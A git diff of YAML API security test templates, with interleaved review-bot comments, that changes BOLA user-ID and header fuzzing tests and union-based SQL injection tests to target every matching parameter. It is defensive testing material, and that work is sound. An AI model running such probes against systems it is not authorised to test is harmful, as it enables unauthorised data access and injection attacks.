diff --git a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml index 3fc4af7e1..80b72e019 100644 --- a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml @@ -79,12 +79,12 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey - query_param: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|^username$|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -96,9 +96,11 @@ execute: requests: - req: - modify_body_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true - modify_query_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml index 68f9bd6f5..8f3a14961 100644 --- a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml 
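Review bot: In the `body_param` filter of BOLAByFuzzingUserIDDELETE.yml the key regex still has an unanchored `username` alternative, while the `query_param` regex in the same hunk uses `^username$`; with the match now captured by `extractMultiple: userKey`, this presumably widens the set of body keys that get rewritten to any key that merely contains "username". If the loose match is not intended, anchor it as `^username$` so both filters agree; if it is intended, say so in a comment above the regex. The same unanchored alternative appears in the body_param filters of the other BOLA templates in this diff (BOLAByFuzzingUserIDPATCH.yml and the BOLAJSONBodyParam* files, among others). The regex also lists `^account_id$` and `^customer_id$` twice, which is harmless but could be trimmed in the same pass.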
@@ -81,12 +81,12 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey - query_param: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|^username$|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -98,9 +98,11 @@ execute: requests: - req: - modify_body_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true - modify_query_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml b/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml index 09c260a18..00c4d6156 100644 --- a/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml 
@@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -92,7 +92,8 @@ execute: requests: - req: modify_body_param: - userKey: "{\"${userKey}\":\"${random_ids}\"}" + ${userKey}: "{\"${userKey}\":\"${random_ids}\"}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml index 3053b435e..b85bd0b54 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: @@ -95,8 +95,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - "${random_ids}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml index 662836047..621cef8e4 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml 
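Review bot: In the second hunk of BOLAByReplacingParamWithJSONObjectPATCH.yml, `${userKey}` now appears both as the map key and inside the JSON string value (`"{\"${userKey}\":\"${random_ids}\"}"`), so with `extractMultiple` and `for_each_combination: true` the result depends on whether both occurrences are bound to the same extracted key in each generated request. Nothing in the hunk shows this; if the engine expands the two occurrences independently, a request could set one parameter to an object keyed by a different parameter, and a pass or fail result would be hard to interpret. Please confirm the binding and record it in a comment above the entry, e.g. `# both ${userKey} occurrences resolve to the same key per combination`. BOLAbyReplacingParamWithJSONObject.yml and BOLAbyReplacingParamWithJSONObjectDELETE.yml carry the identical line.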
@@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: @@ -91,8 +91,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - "${random_ids}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml index 992e1f491..78a6663ff 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -97,9 +97,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml index 0b72b30db..f695ad4d6 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml 
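Review bot: In BOLAJSONBodyParamArrayMultiElements.yml the key is now captured with `extractMultiple: userKey`, but the sibling `value: extract: userVal` is still a single extract, and the execute hunk places `${userVal}` in the array under every `${userKey}`. If more than one body key matches, the original value sent next to `${random_ids}` may belong to a different parameter than the one being modified; the hunk does not show how the engine pairs them. Please confirm that `userVal` is resolved per key, or extract the values in a multi-valued form as well if the engine supports one, and note the pairing in a comment. The same key/value question applies to the other MultiElements templates, to AuthBypassMultiCredentialsSingleParam.yml (`${passwordVal}`), and to the SQLi templates that build `${userVal}${...Payloads}`.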
+++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -95,9 +95,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml index 89d8756f2..e3dabd5b1 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml @@ -91,7 +91,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -106,9 +106,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 
diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml index 24fdf05dd..7f138a123 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -95,9 +95,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml index eafb762a1..3d869a2d7 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: 
@@ -93,8 +93,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - "${random_ids}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml index 171f5c940..100380eda 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml @@ -91,7 +91,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: - 1 @@ -104,8 +104,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml index 448c52205..77ce516c1 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: - 1 
@@ -91,8 +91,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml index de9d0e2d4..faaf8309c 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -93,9 +93,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml index 9be21bda0..bd07b3100 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml @@ -84,7 +84,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: source: sample_data @@ -96,7 +96,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 
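Review bot: In BOLAModifyCustomHeader.yml the variable captured by `extractMultiple: headerValue` is now used as the header name in `${headerValue}: "${specialHeaders}"`, so the name `headerValue` reads as the opposite of what it holds. Renaming it in both hunks, `extractMultiple: headerKey` and `${headerKey}: "${specialHeaders}"`, would match the `userKey` convention used by the other templates. The same applies to the DELETE, PATCH, WithInteger and WithIntegerDELETE variants of this template.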
diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml index 79046957f..ec2d8ae0b 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml @@ -85,7 +85,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: source: sample_data @@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml index a40fab0fd..cbd6ffe8f 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml @@ -87,7 +87,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: source: sample_data @@ -99,7 +99,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml index 8a2c6c685..14bee6173 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml @@ -84,7 +84,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: - 1 
@@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml index 1acff226b..0551e27e0 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml @@ -85,7 +85,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: - 1 @@ -98,7 +98,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml b/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml index 2f4163733..fda25c058 100644 --- a/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml +++ b/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data diff --git a/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml b/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml index fb2392897..96b3ca2f3 100644 --- a/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml 
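Review bot: BOLAQueryParamArray.yml switches its filter to `extractMultiple: userKey`, but unlike the other templates visible in this diff it has no matching hunk in the `execute` section. The execute block is outside the diff, so this may be fine, but if it still uses a literal `userKey:` entry (as the other files did before this change), the multi-valued variable would presumably not be expanded there. Please check that the request modification in this file uses `${userKey}:` together with `for_each_combination: true`, or keep the filter on `extract` until it does.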
+++ b/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml @@ -81,7 +81,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|^username$|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: not_contains: ${attempt_Ids} @@ -97,8 +97,9 @@ execute: requests: - req: - modify_query_param: - userKey: ${attempt_Ids} + ${userKey}: ${attempt_Ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml index fbf99f9f9..b068240e5 100644 --- a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml +++ b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -90,7 +90,8 @@ execute: requests: - req: modify_body_param: - userKey: "{\"${userKey}\":\"${random_ids}\"}" + ${userKey}: "{\"${userKey}\":\"${random_ids}\"}" + for_each_combination: true validate: response_code: gte: 200 
diff --git a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml index 9d10dfdb3..90cb71757 100644 --- a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -90,7 +90,8 @@ execute: requests: - req: modify_body_param: - userKey: "{\"${userKey}\":\"${random_ids}\"}" + ${userKey}: "{\"${userKey}\":\"${random_ids}\"}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml index 864d61c5d..c514330c8 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -100,7 +100,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -152,7 +153,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 
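Review bot: The request fan-out of AdvancedUnionBasedSQLiGET.yml is no longer bounded by the template: the key filter is `regex: ".*"`, so `extractMultiple: userKey` presumably captures every query parameter of the selected API, and each of the three `req` blocks then runs `for_each_combination: true` over keys × payloads. That multiplies the requests sent to the API under test compared with the single-key behaviour before this commit, which matters for rate limits and for endpoints that change state. A comment above the filter stating the expected fan-out, or a narrower key regex, would make the test's load predictable. The `.*` filter is also used in the POST, XSSGET, XSSPOST and AlternateEncodingSQLi GET/POST variants.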
@@ -204,7 +206,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml index 3ed6903eb..fd6943411 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -109,7 +109,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -161,7 +162,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -213,7 +215,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml index 8c7a20ccd..8318ef132 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -100,7 +100,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -152,7 +153,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -204,7 +206,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml index 6bc2256b6..67c22818e 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml 
